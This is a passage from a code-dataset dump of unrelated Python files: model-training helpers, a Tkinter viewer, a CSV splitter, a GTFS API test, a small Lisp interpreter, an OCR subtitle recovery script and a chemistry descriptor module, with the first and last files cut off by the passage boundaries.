change_paths_str == EMPTY_CHANGE_LIST or not change_paths_str:\n return []\n if change_paths_str == TRIGGER_ALL_TEST:\n # when change_paths' content is zz_all_test, all test cases under Konfig/sigma will be tested\n change_paths = all_project_dirs\n else:\n # when KCL_TEST_MODE is 'biz', only cases under specified root dir will be tested\n change_paths = [item for item in change_paths_str.split(\"\\n\") if item]\n ignore_path_list = []\n if ignore_paths_str:\n ignore_path_list = [item for item in ignore_paths_str.split(\",\") if item]\n changed_projects = []\n for change_path in change_paths:\n if any(\n [\n check_path_is_relative_to(change_path, ignore_path)\n for ignore_path in ignore_path_list\n ]\n ):\n continue\n for project_path in all_project_dirs:\n if check_path_is_relative_to(change_path, project_path) and project_path not in changed_projects:\n changed_projects.append(project_path)\n return changed_projects\n","repo_name":"elliotxx/Konfig","sub_path":"hack/lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74987129040","text":"import os\nimport cv2 as cv\nimport numpy as np\nimport utils\nimport PIL.Image\n\n\ndef calibrate_manual(\n src_cam: cv.VideoCapture, dst_cam: cv.VideoCapture, S=(1.0, 1.0), T=(0, 0)\n):\n S = list(S)\n T = list(T)\n keep_ratio = True\n\n while True:\n # read images from both cameras\n is_ok, src_image = src_cam.read()\n if not is_ok:\n continue\n\n is_ok, dst_image = dst_cam.read()\n if not is_ok:\n continue\n\n # Scale\n src_image = cv.resize(src_image, None, fx=S[0], fy=S[1])\n\n # get BGR and Gray\n src_rgba = utils.to_rgba(src_image)\n dst_rgba = utils.to_rgba(dst_image)\n # combine\n src_rgba[:, :, 3] = 170\n src_pil = PIL.Image.fromarray(src_rgba)\n dst_pil = PIL.Image.fromarray(dst_rgba)\n dst_pil.paste(src_pil, (T[0], T[1]), src_pil)\n dst_bgr = np.array(dst_pil)\n\n cv.imshow(\"dst\", dst_bgr[..., [2,1,0,3]])\n\n key = cv.waitKey(10)\n if key == 27:\n break\n elif key != -1:\n if key == ord(\"a\"):\n S[0] -= 0.01\n if keep_ratio:\n S[1] -= 0.01\n elif key == ord(\"d\"):\n S[0] += 0.01\n if keep_ratio:\n S[1] += 0.01\n elif key == ord(\"s\"):\n S[1] -= 0.01\n if keep_ratio:\n S[0] -= 0.01\n elif key == ord(\"w\"):\n S[1] += 0.01\n if keep_ratio:\n S[0] += 0.01\n elif key == ord(\"j\"):\n T[0] -= 1\n elif key == ord(\"l\"):\n T[0] += 1\n elif key == ord(\"i\"):\n T[1] -= 1\n elif key == ord(\"k\"):\n T[1] += 1\n elif key == ord(\"q\"):\n keep_ratio = not keep_ratio\n\n print(f'S={S}, T={T}, keep_ratio={keep_ratio}')\n\n cv.destroyAllWindows()\n\n return S, T\n\n\ndef load_manual(path):\n if os.path.isfile(path):\n data = np.load(path)\n return data[\"S\"], data[\"T\"]\n\n return (1.0, 1.0), (0, 0)\n\ndef save_manual(path, S, T):\n np.savez(path, S=S, T=T)\n\nif __name__ == \"__main__\":\n rgb_cam = cv.VideoCapture(0)\n infrared_cam = utils.InfraredCamera()\n\n S, T = load_manual(\"manual.npz\")\n S, T = calibrate_manual(rgb_cam, infrared_cam, S, T)\n save_manual(\"manual.npz\", S ,T)\n\n rgb_cam.release()\n infrared_cam.release()\n","repo_name":"tranduytrung/camera-alignment","sub_path":"manual.py","file_name":"manual.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5046795647","text":"import json\nimport os\nimport random\nfrom datetime import datetime\nfrom typing import Tuple\nimport sys \n\nimport numpy as np\nimport torch\nfrom torch import nn\nfrom keras.models import Model, model_from_json\n\n\ndef fix_seeds(seed: int=1234) -> None:\n \"\"\"\n Fix all random seeds for reproducibility\n for PyTorch pipelenes\n \"\"\"\n random.seed(seed)\n os.environ[\"PYTHONHASHSEED\"] = str(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed_all(seed)\n torch.backends.cudnn.deterministic = True\n\n\ndef fix_seeds_tf(seed: int=1234) -> None:\n \"\"\"\n Fix all random seeds for reproducibility\n for Tensorflow 2.2\n \"\"\"\n import tensorflow as tf\n random.seed(seed)\n os.environ[\"PYTHONHASHSEED\"] = str(seed)\n os.environ['TF_DETERMINISTIC_OPS'] = str(seed)\n np.random.seed(seed)\n tf.random.set_seed(seed)\n \n\ndef load_optim(optimizer: torch.optim, checkpoint_path: str, device: torch.device) -> torch.optim:\n \"\"\"\n Load optimizer to continuer training\n Args:\n optimizer : initialized optimizer\n checkpoint_path: path to the checkpoint\n device : device to send optimizer to (must be the same as in the model)\n \n Note: must be called after initializing the model \n\n Output: optimizer with the loaded state\n \"\"\" \n checkpoint = torch.load(checkpoint_path) \n optimizer.load_state_dict(checkpoint['optimizer'])\n for state in optimizer.state.values():\n for k, v in state.items():\n if torch.is_tensor(v):\n state[k] = v.to(device) \n\n for param_group in optimizer.param_groups:\n print('learning_rate: {}'.format(param_group['lr'])) \n\n print('Loaded optimizer {} state from {}'.format(optimizer, checkpoint_path)) \n \n return optimizer\n\n\ndef save_ckpt(model: nn.Module, optimizer: torch.optim, checkpoint_path: str) -> dict:\n \"\"\"\n Save model and optimizer checkpoint to continuer training\n \"\"\" \n torch.save({\n 'model': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n },\n checkpoint_path\n )\n print(\"Saved model and optimizer state to {}\".format(checkpoint_path))\n\n\ndef load_ckpt(checkpoint_path: str) -> dict:\n \"\"\"\n Load checkpoint to continuer training\n Args:\n checkpoint_path: path to the checkpoint\n\n Output: (dict) 0f the checkpoint state \n\n \"\"\" \n checkpoint = torch.load(checkpoint_path)\n \n return checkpoint\n\n\ndef load_model(model: nn.Module, checkpoint_path: str) -> tuple:\n \"\"\"\n Load model weigths to continuer training\n Args:\n model : nn model\n checkpoint_path: path to the checkpoint \n\n Output: \n (nn.Module) nn model with weights\n (dict) 0f the checkpoint state\n \"\"\" \n checkpoint = torch.load(checkpoint_path)\n model.load_state_dict(checkpoint['model'])\n \n return model, checkpoint \n\n\ndef collate_fn(batch):\n return tuple(zip(*batch))\n\n\ndef load_weights(model: nn.Module, weights_file: str):\n model.load_state_dict(torch.load(weights_file))\n return model\n\n\ndef plot_layer_output(model: Model, layer_name = 'lambda') -> None:\n new_model = Model(inputs = model.input, outputs = model.get_layer(layer_name).output)\n intermediate_output =new_model.predict(fhr)\n #print(intermediate_output)\n #print(intermediate_output.shape)\n intermediate_out = np.reshape(intermediate_output, (intermediate_output.shape[0], 4800))\n #plot intermediate output\n fig1 = plt.figure(1)\n plt.plot(intermediate_out[0, :, :], 'b')\n plt.show()\n","repo_name":"tatigabru/transforms","sub_path":"src/helpers/model_helpers.py","file_name":"model_helpers.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17346479093","text":"import logging\nfrom tkinter import ttk, filedialog, messagebox, BOTTOM\nimport tkinter as tk\nimport sys\nimport os\nsys.path.append(os.path.join(os.path.dirname(__file__), 'res/'))\nfrom tkinterbase import TkBase # noqa: E402\nfrom data import check_valid_path # noqa: E402\n\ndefault_toolitems = (\n ('Home', 'Reset original view', 'home', 'home'),\n ('Back', 'Back to previous view', 'back', 'back'),\n ('Forward', 'Forward to next view', 'forward', 'forward'),\n (None, None, None, None),\n ('Pan', 'Pan axes with left mouse, zoom with right', 'move', 'pan'),\n ('Zoom', 'Zoom to rectangle', 'zoom_to_rect', 'zoom'),\n ('Subplots', 'Configure subplots', 'subplots', 'configure_subplots'),\n (None, None, None, None),\n ('Annotate', 'Create an annotation', 'annotate', 'call_annotate'),\n ('Confirm', 'Confirm annotation', 'confirm', 'call_confirm'),\n (None, None, None, None),\n ('Open', 'Opens a new project', 'open', 'call_open'),\n ('Export', 'Export to PDF', 'export', 'call_export'),\n ('Save', 'Save the graph as PNG', 'filesave', 'save_figure'),\n ('Open Concurrent', 'Open a concurrent graph view',\n 'compare', 'call_open_concurrent'),\n (None, None, None, None),\n ('Quit', 'Quit application', 'quit', 'call_quit'),\n)\n\n\nclass HomePage:\n\n def __init__(self, master):\n\n logging.basicConfig(filename='event_log.log',\n level=logging.INFO, filemode='w')\n logging.info('Starting application')\n\n # Initialises window with background image and widgets\n self.master = master\n master.title(\"BrainWave Visualization - HomePage\")\n master.iconbitmap(r'res/general_images/favicon.ico')\n self.frame = tk.Frame(self.master)\n fname = r'res/general_images/homepage.png'\n self.bg_image = tk.PhotoImage(file=fname)\n # Centering window\n self.w = self.bg_image.width()\n self.h = self.bg_image.height()\n self.window_width = self.master.winfo_reqwidth()\n self.window_height = self.master.winfo_reqheight()\n self.x = (self.master.winfo_screenwidth() / 2) - (self.w / 2)\n self.y = (self.master.winfo_screenheight() / 2) - (self.h / 2)\n self.master.geometry(\"%dx%d+%d+%d\" % (self.w, self.h, self.x, self.y))\n self.cv = tk.Canvas(width=self.w, height=self.h)\n self.cv.pack(side='top', fill='both', expand='yes')\n self.cv.create_image(0, 0, image=self.bg_image, anchor='nw')\n # Define buttons here\n self.open_button = ttk.Button(\n self.cv, text='Open', width=25, command=self.load_project)\n self.quit_button = ttk.Button(\n self.cv, text='Quit', width=25, command=self.close)\n # Buttons packed here - in descending order (Things at bottom will\n # appear at top)\n self.quit_button.pack(side=BOTTOM, padx=10, pady=25)\n self.open_button.pack(side=BOTTOM, padx=10, pady=25)\n self.frame.pack()\n\n def load_project(self):\n \"\"\"\n handler function for the open button, loads project if given a valid path otherwise does nothing\n \"\"\"\n path = filedialog.askdirectory()\n if not path:\n # If user exits file directory - do nothing\n pass\n else:\n path = path + \"/\"\n try:\n if check_valid_path(path):\n # Destroys homepage and runs main app\n self.open_button.destroy()\n self.quit_button.destroy()\n self.cv.destroy()\n TkBase(root, path, default_toolitems)\n root.resizable(True, True)\n root.configure(bg=\"#949494\")\n except Exception as e:\n # If user picks a folder with no .cal or .wav files - shows\n # error msg\n messagebox.showerror(\"Error: \", e)\n\n def close(self):\n # Pop up to user asking them if they want to quit\n if messagebox.askokcancel(\"\", \"Are you sure you want to quit?\"):\n self.master.destroy()\n\n\nroot = tk.Tk()\nroot.resizable(False, False)\napp = HomePage(root)\nroot.mainloop()\n","repo_name":"ross-johnstone/BrainWave-NHS","sub_path":"homePage.py","file_name":"homePage.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"22845804726","text":"#!/usr/bin/env python\n\nimport pandas as pd\nimport csv\n\narchivocsv = \"/home/raimundoosf/Escritorio/Proyecto2U2/drugsComTest_raw.csv\"\n\n\"\"\"convercion de lista a archivo csv\"\"\"\ndef convert_to_csv(data_name, data):\n\n # se definen las columnas del archvio csv\n columns = [\"uniqueID\", \"drugName\", \"condition\", \"review\", \"rating\", \"date\", \"usefulCount\"]\n \n # crea lista\n rows = []\n # se agregan lineas/filas a lista\n for index in range(0, len(data)):\n rows.append([data[index][\"uniqueID\"], data[index][\"drugName\"],\n data[index][\"condition\"], data[index][\"review\"],\n data[index][\"rating\"], data[index][\"date\"], \n data[index][\"usefulCount\"]])\n\n # se abre/crea archivo csv \n with open(f'{data_name}.csv', 'w') as f:\n # usando csv.writer method desde CSV package\n write = csv.writer(f)\n\n write.writerow(columns)\n write.writerows(rows)\n\n\n\"\"\"separacion de archivo scv por año\"\"\"\ndef separete_files():\n\n # se crea dataframe\n df = pd.read_csv(archivocsv)\n\n # se crea lista para simplificar algoritmia \n data = ['data_2008', 'data_2009', 'data_2010', 'data_2011', 'data_2012',\n 'data_2013', 'data_2014', 'data_2015', 'data_2016', 'data_2017']\n \n # se hace copia de lista\n data_aux = data[:]\n\n # crean listas dentro de copia de lista\n for index in range(0,len(data_aux)):\n data_aux[index] = []\n\n # abre ciclo\n for index in range(0,len(df.index)):\n # 'line' corresponde a linea especifica de 'dt'\n line = df.iloc[index]\n # abre ciclo interno\n for sub_index in range(0, len(data)):\n # si linea contiene ultimos dos caracteres de elemento en 'data'\n if line.str.contains(f'-{data[sub_index][-2:]}').any():\n # se identifica año respectivo de 'line'\n # se agrega 'line' a lista de año respectivo\n data_aux[sub_index].append(line)\n # se acaba ciclo interno\n break\n # no hay asociacion de año determinado en 'data' con 'line'\n else:\n # se continua a siguiente ciclo interno para evetual asociacion\n continue\n \n # abre ciclo for para convertir cada lista 'data_aux[]' a archivo csv\n for index in range(0,len(data)):\n # se llama a funcion\n convert_to_csv(data[index], data_aux[index])\n \nif __name__ == \"__main__\":\n # Llama\n separete_files()\n","repo_name":"raioliva21/Proyecto2-U2","sub_path":"separacion_archivo.py","file_name":"separacion_archivo.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8527144629","text":"import itertools\nimport json\nfrom uuid import UUID\n\nimport pytest\nfrom model_bakery import baker\n\nfrom gtfs.models import Departure, Route, Shape, Trip\nfrom gtfs.tests.utils import clean_shapes_for_snapshot, get_feed_for_maas_operator\n\nENDPOINT = \"/v1/shapes/\"\n\n\n@pytest.fixture\ndef api_id_generator():\n return (UUID(int=i) for i in itertools.count())\n\n\n@pytest.mark.parametrize(\n \"filtering\",\n [\n {},\n {\"route_id\": \"00000000-0000-0000-0000-000000000000\"},\n {\"route_id\": \"00000000-0000-0000-0000-000000000001\"},\n {\"departure_id\": \"00000000-0000-0000-0000-000000000002\"}, # first route\n {\"departure_id\": \"00000000-0000-0000-0000-000000000004\"}, # second route\n ],\n)\n@pytest.mark.django_db\ndef test_shapes(maas_api_client, snapshot, api_id_generator, filtering):\n feed = get_feed_for_maas_operator(maas_api_client.maas_operator, True)\n routes = baker.make(Route, feed=feed, api_id=api_id_generator, _quantity=2)\n shapes = baker.make(\n Shape,\n api_id=iter(\n [\n \"DEADBEEF-0000-0000-0000-000000000000\", # first route\n \"BABEFACE-0000-0000-0000-000000000000\", # first route\n \"C0FFEE00-0000-0000-0000-000000000000\", # second route\n ]\n ),\n feed=feed,\n _quantity=3,\n )\n\n first_route_trips = baker.make(\n Trip,\n feed=feed,\n route=routes[0],\n shape=iter([shapes[0], shapes[1]]),\n _quantity=2,\n )\n second_route_trip = baker.make(Trip, feed=feed, route=routes[1], shape=shapes[2])\n baker.make(\n Departure,\n api_id=api_id_generator,\n trip=iter([first_route_trips[0], first_route_trips[1], second_route_trip]),\n _quantity=3,\n )\n\n response = maas_api_client.get(ENDPOINT, filtering)\n content = json.loads(response.content)\n if filtering:\n assert response.status_code == 200\n content = clean_shapes_for_snapshot(content)\n else:\n assert response.status_code == 400\n snapshot.assert_match(content)\n","repo_name":"City-of-Helsinki/maritime-maas","sub_path":"gtfs/tests/test_shapes_api.py","file_name":"test_shapes_api.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30117993847","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING\nfrom dm.skills.Common._common import CommonSkill\nfrom utilities import SkillEffect, CooldownType\n\nif TYPE_CHECKING:\n from dm.core.contexts import AttackContext\n from dm.core.game.game import DMGame\n from dm.core.objects.unit import DMUnit\n################################################################################\n\n__all__ = (\"Multistrike\",)\n\n################################################################################\nclass Multistrike(CommonSkill):\n\n def __init__(self, state: DMGame, parent: DMUnit = None):\n\n super().__init__(\n state, parent,\n _id=\"SKL-134\",\n name=\"Multistrike\",\n description=(\n \"Inflict 6 (+3.0*ATK) damage to an enemy. Repeats 3 times.\"\n ),\n rank=3,\n cooldown=CooldownType.SingleTarget,\n effect=SkillEffect(base=6, scalar=3)\n )\n\n################################################################################\n def execute(self, ctx: AttackContext) -> None:\n\n # If we're attacking\n if self.owner == ctx.source:\n # Damage the target three times\n for _ in range(3):\n ctx.target.damage(self.effect)\n\n################################################################################\n","repo_name":"AllegroVivo/DungeonDefense","sub_path":"dm/skills/Common/BRank/Multistrike.py","file_name":"Multistrike.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14891310716","text":"# -*- coding: utf-8 -*-\n\nfrom errors import LispNamingError\nfrom types import Builtin, boolean, integer, value_of\n\nclass Environment(dict):\n def __init__(self, vars=None, outer=None):\n self.outer = outer\n if vars:\n self.update(vars)\n\n def __getitem__(self, key):\n return self.defining_env(key).get(key)\n\n def defining_env(self, variable):\n \"Find the innermost environment defining a variable\"\n if variable in self:\n return self\n elif self.outer is not None:\n return self.outer.defining_env(variable)\n else:\n raise LispNamingError(\"Variable '%s' is undefined\" % variable)\n\ndef get_builtin_env():\n \"\"\"Returns an environment with the builtin functions defined.\n\n You probably want to use moolisp.interpreter.default_env instead,\n which is this extended with the Moo Lisp core functions.\"\"\"\n return Environment({\n '+': Builtin(lambda x, y: integer(value_of(x) + value_of(y))),\n '-': Builtin(lambda x, y: integer(value_of(x) - value_of(y))),\n '*': Builtin(lambda x, y: integer(value_of(x) * value_of(y))),\n '/': Builtin(lambda x, y: integer(value_of(x) / value_of(y))),\n 'mod': Builtin(lambda x, y: integer(value_of(x) % value_of(y))),\n\n '=': Builtin(lambda x, y: boolean(x == y)), \n '>': Builtin(lambda x, y: boolean(x > y)), \n '<': Builtin(lambda x, y: boolean(x < y)), \n '>=': Builtin(lambda x, y: boolean(x >= y)), \n '<=': Builtin(lambda x, y: boolean(x <= y)),\n\n 'cons': Builtin(lambda h, rest: [h] + rest),\n 'car': Builtin(lambda lst: lst[0]),\n 'cdr': Builtin(lambda lst: 'nil' if len(lst) == 1 else lst[1:]),\n 'list': Builtin(lambda *args: 'nil' if len(args) == 0 else list(args))\n })\n","repo_name":"kvalle/moo-lisp","sub_path":"moolisp/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31145541656","text":"import os\nfrom alive_progress import alive_bar\nimport datetime\nimport srt\nfrom pathlib import Path\n# Script for recovery of subtitles, in case of main script error\n\n\ndef load_recovery(recovery_path):\n \"\"\" Splits each line on the \"|\" symbol\n\n Args:\n recovery_path (str): path to recovery file\n\n Returns:\n lines (list): list of split lines from recovery file\n \"\"\"\n\n recovery_file = open(recovery_path, \"r\", encoding=\"utf-8\")\n lines = []\n for line in recovery_file:\n lines.append(line.split(\"|\"))\n\n recovery_file.close()\n return lines\n\n\ndef load_subtitles(subtitles_path):\n \"\"\" Loads subtitles from .txt file, removes end spaces and end \\n symbol\n\n Args:\n subtitles_path (str): path to subtitle text file\n\n Returns:\n subtitles (list): list of individual words from the sentences\n native_subtitles (list): list of whole sentences\n \"\"\"\n\n file = open(subtitles_path, \"r+\", encoding=\"utf8\")\n\n # removes blank lines\n temp = []\n subtitles = []\n for line in file:\n if repr(line) == repr('\\n'):\n block = ''.join(temp)\n subtitles.append(block)\n temp = []\n else:\n temp.append(line)\n block = ''.join(temp)\n subtitles.append(block)\n\n # removes the new-line character from end of line\n for element in subtitles:\n subtitles[subtitles.index(element)] = element.rstrip(' \\n')\n native_subtitles = list(subtitles)\n\n # splits the sentence into list of words\n for element in subtitles:\n split = element.split()\n temp = []\n for word in split:\n if \"-\" in word:\n word = word.split(\"-\")\n for split_word in word:\n temp.append(split_word)\n else:\n temp.append(word)\n subtitles[subtitles.index(element)] = temp\n\n file.close()\n return subtitles, native_subtitles\n\n\ndef create_srt(frame_info):\n \"\"\" Creates srt file, from collected frame info\n\n Args:\n frame_info (list): list of information about start and end frames\n \"\"\"\n\n file = open(\"subtitles/Finished_subtitles.txt\", \"w+\", encoding=\"utf8\")\n subtitles = []\n for element in frame_info:\n start = datetime.timedelta(seconds=element[0][0], microseconds=element[0][1])\n end = datetime.timedelta(seconds=element[1][0], microseconds=element[1][1])\n index = element[2]\n content = element[3]\n\n subtitle = srt.Subtitle(index=index, start=start, end=end, content=content)\n subtitles.append(subtitle)\n\n text = srt.compose(subtitles)\n file.write(text)\n file.close()\n\n if os.path.exists(\"subtitles/Finished_subtitles.srt\"):\n os.remove(\"subtitles/Finished_subtitles.srt\")\n p = Path(\"subtitles/Finished_subtitles.txt\")\n p.rename(p.with_suffix('.srt'))\n file.close()\n\n\ndef key_words(current_sub, next_sub):\n \"\"\" Finds words that are in the current subtitle, but are not in the next one\n\n Args:\n current_sub (list): list of words in the current subtitle\n next_sub (list): list of words in the next subtitle\n\n Returns:\n words (list): list of \"keywords\"\n \"\"\"\n\n # Creates a list of same words\n similar_words = []\n for element in current_sub:\n if element in next_sub:\n similar_words.append(element)\n\n # removes same words, leaving only keywords\n for element in similar_words:\n current_sub.remove(element)\n words = current_sub\n\n return words\n\n\ndef text_prep(ocr_text, subtitles, text_index):\n \"\"\" Clears needed text. Deletes all \"wrong\" characters. Characters that are not words.\n\n Args:\n ocr_text (list): Text that the OCR found\n subtitles (list): Loaded subtitles\n text_index (int): Index of subtitle\n\n Returns:\n clear_current (list): Clear current subtitle\n clear_next (list): Clear next subtitle\n clear_ocr (list): Clear OCR text\n \"\"\"\n\n current_sub = subtitles[text_index]\n next_sub = subtitles[text_index+1]\n wrong_char = [\",\", \".\", \"?\", \"/\", \"\\\\\", \"<\", \">\", \";\", \":\", \"'\", \"|\", \"[\", \"]\", \"{\", \"}\", \"!\",\n \"@\", \"#\", \"$\", \"%\", \"^\", \"&\", \"*\", \"(\", \")\", \"=\", \"+\", \"`\", \"~\", \"-\"]\n\n # clears current subtitle\n clear_current = []\n for element in current_sub:\n element = element.lower()\n if element not in wrong_char:\n for char in wrong_char:\n element = element.rstrip(char)\n element = element.lstrip(char)\n clear_current.append(element)\n\n # clears next subtitle\n clear_next = []\n for element in next_sub:\n element = element.lower()\n if element not in wrong_char:\n for char in wrong_char:\n element = element.rstrip(char)\n element = element.lstrip(char)\n clear_next.append(element)\n\n # clear OCR text\n clear_ocr = []\n for element in ocr_text:\n element = element.lower()\n if element not in wrong_char:\n for char in wrong_char:\n element = element.rstrip(char)\n element = element.lstrip(char)\n clear_ocr.append(element)\n\n return clear_current, clear_next, clear_ocr\n\n\ndef how_similar_ocr(clear_ocr_text, current_sub):\n \"\"\" Determines how similar the OCR text is to the current subtitle\n\n Args:\n clear_ocr_text (list): List of current OCR text\n current_sub (list): List of current subtitle text\n\n Returns:\n how_similar (float): Percentage of how similar the OCR is to the subtitle\n \"\"\"\n\n temp_ocr = list(clear_ocr_text)\n similar_words = 0\n for element in current_sub:\n if element in temp_ocr:\n temp_ocr.remove(element)\n similar_words += 1\n how_similar = (similar_words * 100) / len(current_sub)\n\n return how_similar\n\n\ndef how_similar_next(current_sub, next_sub):\n \"\"\" Determines how similar the current subtitle is to the next subtitle\n\n Args:\n current_sub (list): List of current subtitle text\n next_sub (list): List of next subtitle text\n\n Returns:\n how_similar (float): Percentage of how similar the current subtitle is to the next subtitle\n \"\"\"\n\n similar_words = 0\n for element in current_sub:\n if element in next_sub:\n next_sub.remove(element)\n similar_words += 1\n how_similar = (similar_words * 100) / len(current_sub)\n\n return how_similar\n\n\ndef is_similar(ocr_text, text_index, subtitles, acceptable_value=50):\n \"\"\" Decides if the OCR is similar to the current subtitle.\n If current subtitle is not similar to next one - decides based only on similarity.\n If current subtitle is similar to next one - decides based on similarity and keywords.\n Keywords are words that are in the current subtitle, but are not in the next one.\n\n Args:\n ocr_text (list): Current OCR text\n text_index (int): Index of current subtitle\n subtitles (list): List of all subtitles\n acceptable_value (int): Percentage from where the OCR text is considered similar to subtitle\n\n Returns:\n True (bool): If similar and (keywords are in the current subtitle)\n False (bool: If not similar or (no keywords in the current subtitle)\n \"\"\"\n\n # prepares the text and finds keywords\n current_sub, next_sub, clear_ocr_text = text_prep(ocr_text, subtitles, text_index)\n key_word = key_words(current_sub, next_sub)\n\n # finds how similar the OCR is to the subtitle and how similar the current subtitle is to the next one\n how_similar_to_ocr = how_similar_ocr(clear_ocr_text, current_sub)\n how_similar_to_next = how_similar_next(current_sub, next_sub)\n\n # counts how many keywords appear in the OCR\n keys_in_ocr = 0\n temp_ocr = list(clear_ocr_text)\n for word in key_word:\n if word in temp_ocr:\n temp_ocr.remove(word)\n keys_in_ocr += 1\n\n if how_similar_to_next >= 70:\n if how_similar_to_ocr >= acceptable_value and keys_in_ocr == len(key_word):\n return True\n else:\n return False\n else:\n if how_similar_to_ocr >= acceptable_value:\n return True\n else:\n return False\n\n\ndef recover(recovery_path, subtitles_path):\n \"\"\" Creates subtitles based on the information from the recovery file\n\n Args:\n recovery_path (str): Path to recovery file\n subtitles_path (str): Path to subtitles\n \"\"\"\n\n subtitles, native_subtitles = load_subtitles(subtitles_path)\n recovery_lines = load_recovery(recovery_path)\n with alive_bar(len(recovery_lines), force_tty=True) as bar:\n frame_info = []\n text_index = 0\n time_of_frame = []\n i = 0\n while i < len(recovery_lines):\n bad_text_index, ocr_text, name_of_frame, s_time, ms_time = recovery_lines[i]\n s_time = float(s_time)\n ms_time = float(ms_time)\n ocr_text = ocr_text.split(\" \")\n\n if text_index+1 < len(subtitles):\n similar = is_similar(ocr_text, text_index, subtitles)\n\n if similar is True:\n time_of_frame.append([s_time, ms_time])\n elif len(time_of_frame) != 0:\n frame_info.append([time_of_frame[0], time_of_frame[-1], text_index, native_subtitles[text_index]])\n time_of_frame = []\n text_index += 1\n\n if text_index + 1 < len(subtitles):\n similar = is_similar(ocr_text, text_index, subtitles)\n if similar is True:\n time_of_frame.append([s_time, ms_time])\n\n i += 1\n bar()\n create_srt(frame_info)\n\n\nif __name__ == \"__main__\":\n subtitles_file_path = \"subtitles/subtitles4.txt\"\n recovery_file_path = \"subtitles/recovery_file_similar.txt\"\n recover(recovery_file_path, subtitles_file_path)\n","repo_name":"MarcelRossol/OCR-subtitle-sychronisation","sub_path":"create_subtitles/recovery.py","file_name":"recovery.py","file_ext":"py","file_size_in_byte":9917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42289649443","text":"from math import log2 as log\n\nn,k=map(int,input().split())\n\nresult=[]\n\nif n%2==1:\n result.append(1)\n n-=1;k-=1\n #print(n,k)\n\nwhile n>0 and k>0:\n temp=int(log(n))\n j=0\n \n if n>k:\n while(j<=n):\n flag=pow(2,temp-j)\n j+=1\n \n if n-flag>=k-1:\n result.append(flag)\n n-=flag;k-=1\n break\n #print(n,k)\n\n else:\n break\n\n\nif n==k:\n print('YES')\n for i in range(len(result)):\n print(result[i],end=' ')\n for i in range(n):\n print(1,end=' ')\nelse:\n print('NO')\n","repo_name":"Shovon588/Programming","sub_path":"Codeforces with Python/1095C - C. Powers Of Two.py","file_name":"1095C - C. Powers Of Two.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"32888069851","text":"import os\nimport argparse\nimport copy\nimport numpy as np\nimport statistics\nimport random\nfrom ase import neighborlist\nfrom ase.io import read\nfrom ase.data import covalent_radii\n\n# for exponential fitting (CBS extrapolation)\nfrom scipy.optimize import curve_fit\n\n\n### GLOBAL DECLARATIONS ###\n\n# use slightly modified covalent radii from ase for neighbor recognition\ncustom_radii = covalent_radii.copy()\ncustom_radii[3] -= 0.15 # reduce radius of Li\ncustom_radii[6] -= 0.05 # reduce radius of C\n\n# Covalent radii (taken from Pyykko and Atsumi, Chem. Eur. J. 15, 2009, 188-197).\n# Values for metals decreased by 10 %.\n# This was copied from gituhb project dftd3/tad-dftd3/src/tad_dftd3/data.py\ncovalent_rad_2009 = np.array([ \n 0.00, # None\n 0.32,0.46, # H,He\n 1.20,0.94,0.77,0.75,0.71,0.63,0.64,0.67, # Li-Ne\n 1.40,1.25,1.13,1.04,1.10,1.02,0.99,0.96, # Na-Ar\n 1.76,1.54, # K,Ca\n 1.33,1.22,1.21,1.10,1.07,1.04,1.00,0.99,1.01,1.09, # Sc-Zn\n 1.12,1.09,1.15,1.10,1.14,1.17, # Ga-Kr\n 1.89,1.67, # Rb,Sr\n 1.47,1.39,1.32,1.24,1.15,1.13,1.13,1.08,1.15,1.23, # Y-Cd\n 1.28,1.26,1.26,1.23,1.32,1.31, # In-Xe\n 2.09,1.76,1.62, # Cs-La\n 1.47,1.58,1.57,1.56,1.55,1.51,1.52, # Ce-Gd\n 1.51,1.50,1.49,1.49,1.48,1.53,1.46, # Tb-Lu\n 1.37,1.31,1.23,1.18,1.16,1.11,1.12,1.13,1.32, # Hf-Hg\n 1.30,1.30,1.36,1.31,1.38,1.42, # Tl-Rn\n 2.01,1.81,1.67, # Fr-Ac\n 1.58,1.52,1.53,1.54,1.55,1.49,1.49, # Th-Cm\n 1.51,1.51,1.48,1.50,1.56,1.58,1.45, # Bk-Lr\n 1.41,1.34,1.29,1.27,1.21,1.16,1.15,1.09,1.22, # Rf-Cn\n 1.36,1.43,1.46,1.58,1.48,1.57 # Nh-Og\n])\n\n# D3 covalent radii used to construct the coordianation number\ncovalent_rad_d3 = 4.0 / 3.0 * covalent_rad_2009\n\n# number of digits of compounds (dc, e.g. 042) and structures (ds, e.g. 04)\ndc = 3\nds = 2\n\n# the following is used for ACSF and SOAP descriptors\nelements_sym = ('H', 'Li', 'B', 'C', 'N', 'O', 'F', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl')\ncutoff_sym = 5.0 # used for ACSF and SOAP, but may be varied\n\n### END GLOBAL DECLARATIONS ###\n\n\ndef all_equal(lst):\n \"\"\"Checks if all elements of the input list are equal.\"\"\"\n\n first = lst[0]\n equal = True\n for el in lst:\n 